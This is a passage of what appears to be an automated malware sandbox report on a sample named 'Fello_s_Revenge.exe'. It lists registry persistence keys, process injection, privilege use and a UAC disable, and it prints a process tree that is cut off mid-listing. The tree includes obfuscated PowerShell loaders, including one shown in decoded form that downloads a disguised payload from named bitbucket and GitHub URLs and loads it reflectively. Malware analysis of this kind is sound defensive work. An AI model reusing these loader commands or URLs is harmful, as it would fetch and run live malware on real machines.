Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Akgddhmc.dll" | Gqdefddb.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Gqdefddb.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Gqdefddb.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Dhpemm32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Kkfmcc32.dll" | Flfpabkp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Pbihfb32.dll" | Hjlioj32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Iplfej32.dll" | Hnjbeh32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Cfnoogbo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ijppackl.dll" | Cfnoogbo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Bpjmnknl.dll" | Epmfgo32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Epmfgo32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738} | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Hnjbeh32.exe
Modifies registry key 1 TTPs 1 IoCs
pid | Process
3224 | reg.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
4616 | PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4364 | schtasks.exe
3588 | schtasks.exe
4752 | schtasks.exe
5092 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid | Process
1700 | powershell.exe
2052 | powershell.exe
3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
328 | vbc.exe
328 | vbc.exe
2040 | powershell.exe
3544 | c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
3544 | c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
3544 | c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
3544 | c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
Suspicious use of AdjustPrivilegeToken 25 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1700 | powershell.exe
Token: SeDebugPrivilege | 2052 | powershell.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Token: SeDebugPrivilege | 2040 | powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
328 | vbc.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2388 wrote to memory of 1700 | 2388 | Fello_s_Revenge.exe | 30
PID 2388 wrote to memory of 1700 | 2388 | Fello_s_Revenge.exe | 30
PID 2388 wrote to memory of 1700 | 2388 | Fello_s_Revenge.exe | 30
PID 2388 wrote to memory of 1700 | 2388 | Fello_s_Revenge.exe | 30
PID 2388 wrote to memory of 2052 | 2388 | Fello_s_Revenge.exe | 32
PID 2388 wrote to memory of 2052 | 2388 | Fello_s_Revenge.exe | 32
PID 2388 wrote to memory of 2052 | 2388 | Fello_s_Revenge.exe | 32
PID 2388 wrote to memory of 2052 | 2388 | Fello_s_Revenge.exe | 32
PID 2388 wrote to memory of 2708 | 2388 | Fello_s_Revenge.exe | 34
PID 2388 wrote to memory of 2708 | 2388 | Fello_s_Revenge.exe | 34
PID 2388 wrote to memory of 2708 | 2388 | Fello_s_Revenge.exe | 34
PID 2388 wrote to memory of 2708 | 2388 | Fello_s_Revenge.exe | 34
PID 2388 wrote to memory of 2808 | 2388 | Fello_s_Revenge.exe | 35
PID 2388 wrote to memory of 2808 | 2388 | Fello_s_Revenge.exe | 35
PID 2388 wrote to memory of 2808 | 2388 | Fello_s_Revenge.exe | 35
PID 2388 wrote to memory of 2808 | 2388 | Fello_s_Revenge.exe | 35
PID 2388 wrote to memory of 2732 | 2388 | Fello_s_Revenge.exe | 36
PID 2388 wrote to memory of 2732 | 2388 | Fello_s_Revenge.exe | 36
PID 2388 wrote to memory of 2732 | 2388 | Fello_s_Revenge.exe | 36
PID 2388 wrote to memory of 2732 | 2388 | Fello_s_Revenge.exe | 36
PID 2388 wrote to memory of 2636 | 2388 | Fello_s_Revenge.exe | 37
PID 2388 wrote to memory of 2636 | 2388 | Fello_s_Revenge.exe | 37
PID 2388 wrote to memory of 2636 | 2388 | Fello_s_Revenge.exe | 37
PID 2388 wrote to memory of 2636 | 2388 | Fello_s_Revenge.exe | 37
PID 2388 wrote to memory of 4500 | 2388 | Fello_s_Revenge.exe | 38
PID 2388 wrote to memory of 4500 | 2388 | Fello_s_Revenge.exe | 38
PID 2388 wrote to memory of 4500 | 2388 | Fello_s_Revenge.exe | 38
PID 2388 wrote to memory of 4500 | 2388 | Fello_s_Revenge.exe | 38
PID 2732 wrote to memory of 3264 | 2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe | 39
PID 2732 wrote to memory of 3264 | 2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe | 39
PID 2732 wrote to memory of 3264 | 2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe | 39
PID 2732 wrote to memory of 3264 | 2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe | 39
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3256 | 2388 | Fello_s_Revenge.exe | 40
PID 2388 wrote to memory of 3392 | 2388 | Fello_s_Revenge.exe | 41
PID 2388 wrote to memory of 3392 | 2388 | Fello_s_Revenge.exe | 41
PID 2388 wrote to memory of 3392 | 2388 | Fello_s_Revenge.exe | 41
PID 2388 wrote to memory of 3392 | 2388 | Fello_s_Revenge.exe | 41
PID 2808 wrote to memory of 3416 | 2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe | 42
PID 2808 wrote to memory of 3416 | 2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe | 42
PID 2808 wrote to memory of 3416 | 2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe | 42
PID 2808 wrote to memory of 3416 | 2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe | 42
PID 2388 wrote to memory of 3456 | 2388 | Fello_s_Revenge.exe | 43
PID 2388 wrote to memory of 3456 | 2388 | Fello_s_Revenge.exe | 43
PID 2388 wrote to memory of 3456 | 2388 | Fello_s_Revenge.exe | 43
PID 2388 wrote to memory of 3456 | 2388 | Fello_s_Revenge.exe | 43
PID 2388 wrote to memory of 3544 | 2388 | Fello_s_Revenge.exe | 44
PID 2388 wrote to memory of 3544 | 2388 | Fello_s_Revenge.exe | 44
PID 2388 wrote to memory of 3544 | 2388 | Fello_s_Revenge.exe | 44
PID 2388 wrote to memory of 3544 | 2388 | Fello_s_Revenge.exe | 44
PID 2388 wrote to memory of 3664 | 2388 | Fello_s_Revenge.exe | 45
PID 2388 wrote to memory of 3664 | 2388 | Fello_s_Revenge.exe | 45
PID 2388 wrote to memory of 3664 | 2388 | Fello_s_Revenge.exe | 45
PID 2388 wrote to memory of 3664 | 2388 | Fello_s_Revenge.exe | 45
PID 3416 wrote to memory of 3740 | 3416 | Morfey.EXE | 47
PID 3416 wrote to memory of 3740 | 3416 | Morfey.EXE | 47
PID 3416 wrote to memory of 3740 | 3416 | Morfey.EXE | 47
PID 3264 wrote to memory of 3656 | 3264 | Cfnoogbo.exe | 46
PID 3264 wrote to memory of 3656 | 3264 | Cfnoogbo.exe | 46
System policy modification 1 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵PID:1100
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1164
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\Fello_s_Revenge.exe"C:\Users\Admin\AppData\Local\Temp\Fello_s_Revenge.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAaQB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAagBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEMATwBPAEsARQBEACAATwBOAEMARQAgAEEARwBBAEkATgAgAEIAWQAgAEYANdhs3DXYKd012CndbwAgAEwATQBBAE8AIQAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAHUAZgAjAD4A"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAcwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBxACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"3⤵
- Executes dropped EXE
PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Roaming\Morfey.EXEC:\Users\Admin\AppData\Roaming\Morfey.EXE4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\cmd.execmd.exe /c grw.vbs5⤵PID:3740
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\grw.vbs"6⤵PID:3896
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ
#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ
#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DY#MQBl#HM#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#Hc#cQB0#HI#ZQB0#HI#ZQ#v#Gs#cgB1#HI#ZQBt#Gw#dQBy#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxDutionpolicy bypass -Noprofile -command $OWjuxD"7⤵
- Command and Scripting Interpreter: PowerShell
PID:1396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.61es/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3720
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"3⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\Cfnoogbo.exeC:\Windows\system32\Cfnoogbo.exe4⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\SysWOW64\Cpiqmlfm.exeC:\Windows\system32\Cpiqmlfm.exe5⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3656 -
C:\Windows\SysWOW64\Dhpemm32.exeC:\Windows\system32\Dhpemm32.exe6⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3004 -
C:\Windows\SysWOW64\Epmfgo32.exeC:\Windows\system32\Epmfgo32.exe7⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1608 -
